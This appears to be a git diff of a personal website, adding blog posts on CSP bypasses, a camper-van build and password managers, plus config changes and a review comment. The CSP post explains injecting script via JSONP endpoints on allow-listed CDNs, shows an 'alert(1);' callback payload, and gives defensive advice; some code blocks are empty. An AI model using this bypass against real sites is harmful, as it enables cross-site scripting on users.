+which is a security feature implemented by web browsers to prevent a web page
+from making requests to a different domain than the one that served the web
+page.
+
+The way JSONP works is as follows:
+
+1. The client-side code defines a function, to processes JSON data.
+1. A `
+
+```
+
+The response to that data script would look something like:
+
+```javascript
+handleResponse({
+ "name": "John Doe",
+ "age": 30
+});
+```
+
+JSONP was a popular technique in the past, as it allowed developers to make
+cross-domain requests without running into the same-origin policy.
+
+However, if a user is able to inject a script tag into a document, and a CDN
+that is known to host JSONP endpoints is on the allow-list, they could include
+something like
+
+```html
+
+```
+
+Most implementations will then return the following:
+
+```javascript
+alert(1);handleResponse({
+ "name": "John Doe",
+ "age": 30
+});
+```
+
+JSONP is now generally discouraged, in favour of
+[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to
+explicitly allow some resources to be requested across origins. However, note
+that many CDNs host JSONP endpoints, so even if your site doesn't use them,
+allowing a domain that hosts them is enough to provide a CSP bypass in many
+situations. The CSP does allow sub directories or even specific files to be
+added to the allow-list, so if unsure about whether a CDN provides JSONP
+endpoints, you may wish to explicitly allow a specific file on the CDN, rather
+than all files.
+
+For example:
+
+```
+Content-Security-Policy: script-src http://example.com/file.js;
+```
+
+as opposed to
+
+```
+Content-Security-Policy: script-src http://example.com/;
+```
+
+### Domains Which Allow Uploads
+
+When you include a domain in your CSP, you're essentially giving control of your
+website's security to that platform and all the developers who publish code on
+it. Not only does this potentially introduce [supply chain
+attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html),
+many CDNs also allow public submission. Unpkg, for instance, is a popular CDN
+that hosts everything on NPM. All you need to submit code to it is a free NPM
+account. If a CSP includes unpkg, or one of the many similar services, in their
+CSP; anyone can submit code that the CSP will allow to run.
+
+#### Self source
+
+It is worth noting that the `'self'` keyword can introduce a similar issue.
+
+The `'self'` source is a shortcut to allow sources from
+the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin).
+
+The difference between origin and site has been discussed [elsewhere in more
+detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an
+origin is defined by scheme (protocol), hostname (domain), and port of the url.
+Sub domains are a different origin, although often the same same site.
+
+```
+https://example.jonathanh.co.uk:443/something/cool
+│ │
+└────────────Origin───────────────┘
+
+https://example.jonathanh.co.uk:443/something/cool
+ │ │
+ └────Site─────┘
+```
+
+Normally, including `'self'` is safe, although care should be taken if you allow
+users of your site to upload content, and that content is accessible on the same
+origin. If so, a user could potentially upload a malicious file and bypass the
+CSP as the file is available under the `'self'` domain.
+
+
+### Other Permissive Sources
+
+The following are considered permissive.
I won't go into too much detail for
+each, but ideally you should avoid using:
+
+* `https:` - Any source that is hosted on an encrypted server. A malicious actor
+ can very easily spin up a server with a valid certificate
+* `data:` - Any source that can be loaded via a data scheme. In most cases, this
+ just involves base64 encoding a payload.
+
+
diff --git a/content/blog/022-new-van.md b/content/blog/022-new-van.md
new file mode 100644
index 0000000..ccea0ac
--- /dev/null
+++ b/content/blog/022-new-van.md
@@ -0,0 +1,158 @@
+---
+title: I Got a Van
+date: 2024-08-24
+tags:
+ - Van Build
+description: >
+ I've bought a van. I'm planning on converting it to a camper and documenting
+ the process here.
+---
+
+So, as you've probably gathered from the title, I've bought a van. Or, at least,
+reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato
+L4H2 which means it's long and quite tall.
+
+There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One
+of the biggest requirements we have is that the van is both comfortable and safe
+for him to live and travel in. We have some ideas and thoughts around this, but
+you will hopefully see what that looks like in future posts.
+
+My plan is to convert this van into a camper. This first post is mainly a brain
+dump, for me as much as anyone else, about my current plans. Many will change,
+some may be scrapped all together.
+
+We are not planning on living in the van. However, it would be nice if we can go
+away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously,
+we will use it for shorter weekend breaks, but we don't want to be limited
+to a week or so at a time. As a result, we should be able to work from the van.
+
+We are in a very fortunate position that my wife and I both work from home for
+the vast majority of the time. As a result, as long as we have a reasonable
+internet connection and electricity, we can both work.
+
+Obviously, if we are both working off laptops, and potentially with additional
+monitors, or power consumption is likely to be on the higher end. The electrical
+system in the van will definitely be a separate blog post, but at the moment, it
+looks like we'll be going for [LiFePO_4_
+batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery).
+Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so
+we can charge the batteries whilst driving.
We will probably also add a shore
+power hookup, but that may come further down the line.
+
+For the internet side of things, I plan to mount a 5G antenna on the roof.
+Despite the name, it should pick up all the Gs. I will be on the look out for a
+router that I can plug such an antenna into, preferably one that supports the
+something like OpenWRT.
+
+This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It
+will be available in the van for all my ESP boards (more on that later), but if
+I'm working on my laptop, I want it plugged in with a cable. So, I will be
+running Ethernet in my van, as well as power and water and whatever else I need
+to make it into a camper. I won't be going overboard like I did in my house -
+weight is a consideration in a van and cables are heavy; but I will be running
+it to (as a minimum) the office space for me and my wife, and my van server.
+
+Van server? Yes, you heard (read?) that right. I'll be having a server in my
+van. I am not sure yet if I'll be going down the Pi route, or something like a
+Nuc, but I will be having a low-ish powered server in the van. This will run
+things like [Home Assistant](https://www.home-assistant.io/) (more on that in a
+bit), [PiHole](https://pi-hole.net/),
+[AudioBookShelf](https://www.audiobookshelf.org/),
+[WireGuard](https://www.wireguard.com/) and maybe a few other things.
+Importantly, I won't be using it to run things that need a lot of power - think
+Jellyfin, Ollama and such.
+
+Things might change. Obviously, with a server that can go on motorways, spinning
+hard drives are a no-go. So storage is likely to have to be solid state for
+everything. As a result, I won't really be using this for a NAS. Storage of
+photos and videos will still go to my home server in my house. But things like
+audiobooks and podcasts that I am likely to want to listen to on the go will be
+stored on the local network.
+
+So, I mentioned Home Assistant.
I am a big fan of **some** smart home tech. For
+me to be a fan of it, it needs to run (or be made to run) locally. Being able to
+turn your lights on from your phone is great, but if the switch on the wall
+doesn't work without an internet connection, I'm not interested. In my house,
+all of our light switches have been flashed with [ESPHome](https://esphome.io/).
+This custom firmware allows the switch to be controlled via Home Assistant, but
+importantly, even if my network has some catastrophic failure, the button still
+works. In the van, the chances of no internet are likely to be high - even with
+a fancy antenna on the roof. So, requiring the internet is an absolute no go for
+me.
+
+That will probably mean a whole bunch of DIY devices. I should be able to quite
+easily make things like lighting smart. I would also like to think that things
+like water sensors for my fresh and waste water can be read by an ESP device.
+What will probably take a bit more work / experimentation will be plugging an
+ESP device into the vehicles CAN bus to see if I can read data from that. It
+would also be great to have things like celling fans and heaters controllable
+from Home Assistant.
+
+Talking of fans and heaters, it is probably worth me mentioning that I will be
+trying to keep costs down where possible - or at least prioritising where money
+is spent. I would much rather, for instance, buy a cheap [Chinese celing
+fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel
+heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy
+decent electronics from the likes of [Victron](https://www.victronenergy.com/).
+
+Of course, I'll be taking things like the fans apart to see if I can stick an
+ESP chip in them and control them with Home Assistant.
+
+With regard to cooking in the van, I'm currently undecided on the best course of
+action. I would like to go fully electric, with induction hobs and an electric
+oven.
Obviously, this would mean I need even more batteries in the van, which
+will increase the weight even more. However, I think with the amount of driving
+we normally do, I should be able to keep batteries topped up from the vehicle's
+alternator. It is possible that we will keep a gas camping stove somewhere so
+that if we're caught out, we can still boil water and heat food. But I would
+rather avoid the added hassle of gas canisters and piping if I can.
+
+With regard to water, I would like to mount both fresh and waste water tanks
+under the van. I don't yet know how big they will be, and will probably be
+determined by weight restrictions. However, my plan is to fit a low powered
+immersion heater into these to prevent them freezing in the winter. I won't be
+using this to make hot water, just to keep the temperature of the water above
+freezing - again probably powered by an ESP chip.
+
+Hot water is a different story. I have seen many youtube van builders pipe their
+diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I
+would also like to try and heat the water from the engine's coolant system. I
+haven't seen this done in a camper (I'm not suggesting it hasn't been done), but
+I have seen it done [on other
+vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o).
+
+One thing I'm fairly sure I don't want in the van is a full sized shower. At
+least, not an internal one. Space is a premium in a van, and in my opinion, the
+space a shower takes up is unnecessary. I will probably add something like the
+[Bullfinch External Shower
+Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/),
+so we can have outdoor showers if we need them. But most of the time, I think
+we'll be able to make do with a flannel and a bowl of hot water. It does mean
+that the sink in the van will need to be big enough to wash our hair in.
An
+added bonus of the external shower system is we'll be able to wash off Rumple
+before he gets in the van when he inevitably gets covered in mud.
+
+Only thing I haven't really touched upon is the planned layout. That will
+probably be my next blog post, but I plan to keep it quite simple. Bed at the
+back. Undecided yet on the orientation, and that will depend if I can sleep
+width ways once we've added the insulation. If I can't, and we end up making the
+bed go length ways, we will probably have an "almost" fixed bed, where the
+bottom foot or so is removable and is used as a back rest or something. This
+frees up some more space in the middle of the van during the day, but still
+means we don't need to make our bed each evening.
+
+The cab area will have swivel seats. This will make our main living / working
+area, and as a result, we won't have a separate "lounge". Again, space is at a
+premium in a van.
+
+Between the cab / living area and the bed will be our kitchen and toilet areas,
+as well as a spot for Rumple's bed. Importantly this will include a mounting
+point for his harness so he is secured whilst driving.
+
+Before I finish up, it's probably important that I clarify a few things. I will
+be learning as I go. I will be making mistakes and I will aim to share those
+with you. However, this "build log" will not be tutorials. I am not an
+electrician, so don't take electrical advice off me. Same for plumbing or
+carpentry or anything else for that matter. That being said, if you spot
+something I could be doing better, or an idea you think I might like, or just
+want to say hi, leave a comment by emailing `comments.new-vanjn.hn`.
diff --git a/content/blog/023-wallace-and-gromit-passwords.md b/content/blog/023-wallace-and-gromit-passwords.md
new file mode 100644
index 0000000..fb608e7
--- /dev/null
+++ b/content/blog/023-wallace-and-gromit-passwords.md
@@ -0,0 +1,56 @@
+---
+title: Passwords Most Fowl
+date: 2024-12-26
+tags:
+ - Security
+description: >
+ If you're like me, some of yesterday (Christmas 2024) was spent watching the
+ new Wallace and Gromit. I wonder if like me it also got you thinking about
+ password managers.
+---
+
+**Warning:** Contains Spoilers!
+
+If you caught the latest episode, "Vengeance Most Fowl," you know, they were
+once again up against the sneaky Feathers McGraw, who pulls off a pretty clever
+hack involving a "smart gnome." The twist? The gnome’s password was super easy
+to guess! While it's all in good fun, it’s a great reminder of why we should all
+be using password managers.
+
+In the episode, Feathers McGraw’s ability to crack the gnome's password
+highlights a real issue we face today: weak passwords. Let's be honest, are you
+still using simple passwords like birthdays or pets' names? Or maybe your pets
+name with a 1 and an exclamation mark? It’s way too easy for hackers to figure
+those out, and that puts our personal info at risk.
+
+Now, imagine if Wallace had a password manager. If he'd used it properly,
+he would've had strong, unique passwords for all his inventions and accounts.
+He could have even shared the passwords with his trusty companion.
+
+That would've made it nearly impossible for Feathers McGraw - or anyone else for
+that matter - to break into the gnomes. Or at least, not by guessing the
+passwords.
+
+I'd also like to draw attention to everything getting "smart" in our
+increasingly connected world, it seems like everything is getting a smart
+upgrade - from our fridges to our light bulbs, and even garden gnomes!
+
+While the convenience of smart devices can be appealing, there are some serious
+risks that come with connecting everything to the internet. In "Vengeance Most
+Fowl," the hacked smart gnome serves as a perfect example of how these devices
+can become vulnerabilities.
When we connect everyday items to the internet, we
+open the door for hackers to exploit them, potentially gaining access to our
+personal information or even taking control of our homes.
+
+Whilst the gnomes in Wallace and Gromit were obviously over the top and comical,
+it's become the norm for everything from cameras to lawn mowers to be connected.
+
+Imagine a world where your smart gnome could be used to spy on you or trigger a
+series of unfortunate events, just like in the episode. The more devices we
+connect, the more points of entry there are for cybercriminals. Many of these
+smart devices come with default passwords or lack robust security features,
+making them easy targets. It's crucial to remember that while technology can
+make our lives easier, it also requires us to be vigilant about our security
+practices. By being mindful of what we connect to the internet and ensuring that
+we use strong passwords and security measures, we can enjoy the benefits of
+smart technology without falling victim to the dangers it can bring.
diff --git a/content/card.curl b/content/card.curl
index 93f2411..768a8d0 100755
--- a/content/card.curl
+++ b/content/card.curl
@@ -44,6 +44,8 @@ ${LRED}Jonathan Hodgson${NC} ${RED}CONTACT${NC} ${ORANGE}Email: ${GREEN}jonathan@jonathanh.co.uk${NC}
+${ORANGE}Matrix: ${GREEN}@jonathan:jn.hn${NC}
+${ORANGE}Mastodon: ${GREEN}@archie2870@mastodon.technology${NC}
 ${ORANGE}Dotfiles: ${GREEN}https://jn.hn/dots/${NC} ${ORANGE}Blog: ${GREEN}https://jn.hn${NC}
diff --git a/content/help-me-out.md b/content/help-me-out.md
index 4e21332..f8c4d3b 100644
--- a/content/help-me-out.md
+++ b/content/help-me-out.md
@@ -10,11 +10,18 @@ I hate websites tracking me so I won't be tracking you if you visit my website. * Bitcoin Wallet: 132AM5imvDiWXJQGfMiGBmvnfaChaUTaQ6 * PayPal Me:
+## Amazon Associates Links
+
+In some blog posts, I include links to products that are part of the [Amazon
+Associates](https://affiliate-program.amazon.co.uk/) program. At no cost to you,
+I receive a small commission based on any sales that are made using the link. I
+would appreciate it if you could use these links when making purchases, although
+understand fully if you choose not to. I will aim to include a non-associates
+link along side the associates one.
+
 ## Indirectly If you can't afford (or don't want) to support me, that's fine. The content I put out will always be freely available and without any form of tracking. There are some affiliate links you can use that I will get a kick back from. Be warned though, some of these services might track you - unfortunately that is out of my control. If you don't want them to, don't click the links. -* Lbry: - Lbry is a decentralised video sharing platform. By signing up with this link, they give me some of the crypto currency the platform is built around. * Digital Ocean: - Digital ocean is a hosting platform. By using this link, you will get $100 to spend (it expires after 60 days). I will also get $25 if you use it. * Smarty: - (UK Only) If you sign up for Smarty sim card, we both get a free month. -* Curve: - All your cards in one. If you sign up, we each get £5
diff --git a/content/microblog/1645562722 b/content/microblog/1645562722
new file mode 100644
index 0000000..1bd2db5
--- /dev/null
+++ b/content/microblog/1645562722
@@ -0,0 +1,4 @@
+---
+title: Tue 22 Feb 2022 20:45:22 GMT
+---
+I'm bad at blogging, let's see if I'm any better at micro-blogging
diff --git a/content/microblog/1645886681 b/content/microblog/1645886681
new file mode 100644
index 0000000..7dd4e4a
--- /dev/null
+++ b/content/microblog/1645886681
@@ -0,0 +1,4 @@
+---
+title: Sat 26 Feb 2022 14:44:41 GMT
+---
+Back from a super wedding of close friends. Hopefully I'll be able to keep up an almost-daily micro blog
diff --git a/content/microblog/1646152089 b/content/microblog/1646152089
new file mode 100644
index 0000000..ba899a6
--- /dev/null
+++ b/content/microblog/1646152089
@@ -0,0 +1,4 @@
+---
+title: Tue 1 Mar 2022 16:28:09 GMT
+---
+Why can I not make my QT apps look right? *sigh*
diff --git a/content/microblog/1646185440 b/content/microblog/1646185440
new file mode 100644
index 0000000..d17c924
--- /dev/null
+++ b/content/microblog/1646185440
@@ -0,0 +1,4 @@
+---
+title: Wed 2 Mar 2022 01:44:00 GMT
+---
+What a terrible journey. :( Home now, time for bed
diff --git a/content/other-stuff-you-might-like.md b/content/other-stuff-you-might-like.md
index 9349a88..8701b26 100644
--- a/content/other-stuff-you-might-like.md
+++ b/content/other-stuff-you-might-like.md
@@ -9,13 +9,21 @@ I consume a lot more content than I produce. If you are interested in similar st
 ### HexDSL
-Does a lot of videos on Linux gaming (not of much interest to me) but also does
-great videos on non-gaming linux content. *Side note:* He seems like a great guy
-on his discord server.
+Used to do a lot of videos on Linux. Those old videos still great. Now probably
+falls more under general interest.
+
+*Side note:* He is a great guy. Got to meet him in real life and talk quite a
+bit on Discord.
 * [Website](https://hexdsl.co.uk/) * [Youtube](https://www.youtube.com/channel/UCRE3NFNtdjR96-H4QG4U1Fg)
+### Josuhua Crew
+
+Lots of linux-y things
+
+* [Website](https://www.joshuacrewe.co.uk/)
+
 ### Brodie Robertson Videos about Linux and surrounding areas
@@ -29,12 +37,34 @@ Mostly videos on Vim and some tools he uses with Vim. * [Youtube](https://www.youtube.com/channel/UCXPHFM88IlFn68OmLwtPmZA)
+## Home Assistant / Smart Home
+
+### 3Ative
+
+Put ESPs in all the things. Very useful if you want to get into electronics.
+
+*Side note*: Seems like a great guy in Discord!
+
+* [Youtube](https://www.youtube.com/user/3ative)
+
+### Speak to the Geek
+
+Product reviews - focus on heating systems and energy, but covers other stuff.
+
+* [Youtube](https://www.youtube.com/@SpeakToTheGeekTech)
+
 ### Self Hosted Podcast about self hosting. Talks a lot about home automation. * [Podcast](https://selfhosted.show/)
+### Everything Smart Home
+
+Mostly product reviews and home assistant tutorials
+
+* [Youtube](https://www.youtube.com/@EverythingSmartHome)
+
 ## Security ### Darknet Diaries
diff --git a/content/wishlist.md b/content/wishlist.md
new file mode 100644
index 0000000..6ed35e6
--- /dev/null
+++ b/content/wishlist.md
@@ -0,0 +1,64 @@
+---
+title: Wishlist
+---
+
+This is a list of things I'd like. I'll probably get around to getting some of
+them at some point. If you are looking to get me something, this might be a good
+place to look
+
+## Van
+
+
+
+## Smart Home
+
+### Door / window sensors (~£10 each)
+
+Eventually I'll want one on every window and door so duplicating these isn't a
+problem. I am not fussy about the brand. As long as it's zigbee
+
+
+
+
+## 3d printing
+
+### Filament
+
+Basically any reputable brand. Esun, elagoo, sovol. I mostly use PLA. Sometimes
+it's sold as PLA+. Occasionally use PETG or TPU.
+
+Use black and navy blue most.
+
+
+
+## Coffee
+
+
+
+
+
+
+### Arco Grinder (~£350)
+
+
+
+## Covert Companion (~$90)
+
+
+
+### Expansion Pack
+
+
+
+## Memory Sticks
+
+Below are examples. Get a reputable brand. I am yet to get "enough" memory
+sticks.
+
+
+
+
+
+## Other random stuff
+
+Hacksmith mini saber:
diff --git a/docker-compose.yml b/docker-compose.yml
index 2e16d98..8d1bfe4 100644
--- a/docker-compose.yml +++ b/docker-compose.yml @@ -6,5 +6,16 @@ services: - "8080:80" volumes: - ./nginx:/etc/nginx/conf.d:ro - - ./public_html:/usr/share/nginx/html:ro + - ./public:/usr/share/nginx/html:ro - ./assets:/usr/share/nginx/assets:ro + + gemini: + image: adrianhesketh/gemini + volumes: + - ./public:/content:ro + - ./gem-cert:/certs:ro + environment: + - PORT=1965 + - DOMAIN=jonathanh.co.uk + ports: + - "1965:1965" diff --git a/nginx/default.conf b/nginx/default.conf index ffcc557..613449c 100644 --- a/nginx/default.conf +++ b/nginx/default.conf @@ -1,4 +1,4 @@ -include mime.types +include mime.types; types { text/markdown md;
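Review bot: The new `gemini` service is declared as `image: adrianhesketh/gemini` with no tag or digest, so every pull can silently resolve to a different build and the container that serves `./public` over TLS on port 1965 is neither reproducible nor auditable. Pin it, e.g. `image: adrianhesketh/gemini:<TAG>@sha256:<DIGEST>` (constructed placeholders — take the real values from the registry once a version is chosen). The `./gem-cert:/certs:ro` mount presumably carries the Gemini TLS certificate and private key; a one-line comment above it such as `# gem-cert/ holds the TLS key pair for the Gemini listener — keep it out of version control` would record that expectation for the next reader, since nothing in the compose file says so. The `:ro` on both new volume mounts is the right choice and should stay.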